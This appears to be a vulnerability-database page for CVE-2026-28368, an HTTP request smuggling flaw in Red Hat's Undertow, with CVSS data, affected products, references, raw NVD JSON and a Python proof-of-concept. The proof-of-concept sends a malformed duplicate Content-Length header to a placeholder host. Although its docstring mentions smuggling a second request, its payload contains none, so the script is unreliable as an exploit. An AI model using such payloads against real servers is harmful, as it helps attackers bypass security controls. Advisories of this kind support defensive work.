Security Vulnerability Report
CVE-2026-28368 CVSS 8.7 HIGH

Published: 2026-03-27 17:16:28
Last Modified: 2026-03-31 18:20:30

Description

A flaw was found in Undertow. This vulnerability allows a remote attacker to construct specially crafted requests where header names are parsed differently by Undertow compared to upstream proxies. This discrepancy in header interpretation can be exploited to launch request smuggling attacks, potentially bypassing security controls and accessing unauthorized resources.

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N (secondary metric in the NVD record)
NVD primary metric: 9.1 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Weakness: CWE-444 (Inconsistent Interpretation of HTTP Requests, "HTTP Request/Response Smuggling")

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:undertow:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
Undertow (see the Red Hat advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Target configuration
host = "target.example.com"
port = 80


def send_smuggling_request():
    """
    PoC for HTTP Request Smuggling via Header Parsing Discrepancy.
    This attempts to send a request that the proxy interprets differently
    than the Undertow backend, potentially smuggling the second request.
    """
    # Constructing a request with a malformed header name
    # The space before 'Content-Length' might be handled differently
    # by the proxy vs Undertow.
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Length: 6\r\n"
        " Content-Length: 4\r\n"  # Malformed header: leading space
        "\r\n"
        "123456"
    )
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload.encode())
        # Receive response to observe behavior
        response = s.recv(4096)
        print("Response received:")
        print(response.decode())
        s.close()
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    send_smuggling_request()
```

References

https://access.redhat.com/security/cve/CVE-2026-28368 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2443261 (Issue Tracking, Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-28368", "sourceIdentifier": "[email protected]", "published": "2026-03-27T17:16:27.993", "lastModified": "2026-03-31T18:20:30.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Undertow. This vulnerability allows a remote attacker to construct specially crafted requests where header names are parsed differently by Undertow compared to upstream proxies. This discrepancy in header interpretation can be exploited to launch request smuggling attacks, potentially bypassing security controls and accessing unauthorized resources."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "19B253BB-F6CE-400B-87EF-1DF1AFFC2445"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "06A6AC25-2E2D-4359-A806-CC0355513A20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "7095200A-4DAC-4433-99E8-86CA88E1E4D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "AAD91726-93D9-4230-BF69-6A79B58E09E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "72A54BDA-311C-413B-8E4D-388AD65A170A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D8BC03A-4198-4488-946B-3F6B43962942"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A24CBFB-4900-47A5-88D2-A44C929603DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "20A6B40D-F991-4712-8E30-5FE008505CB7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:undertow:-:*:*:*:*:*:*:*", "matchCriteriaId": "8190B427-8350-43AE-8F54-6A40B701C95E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-28368", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443261", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
```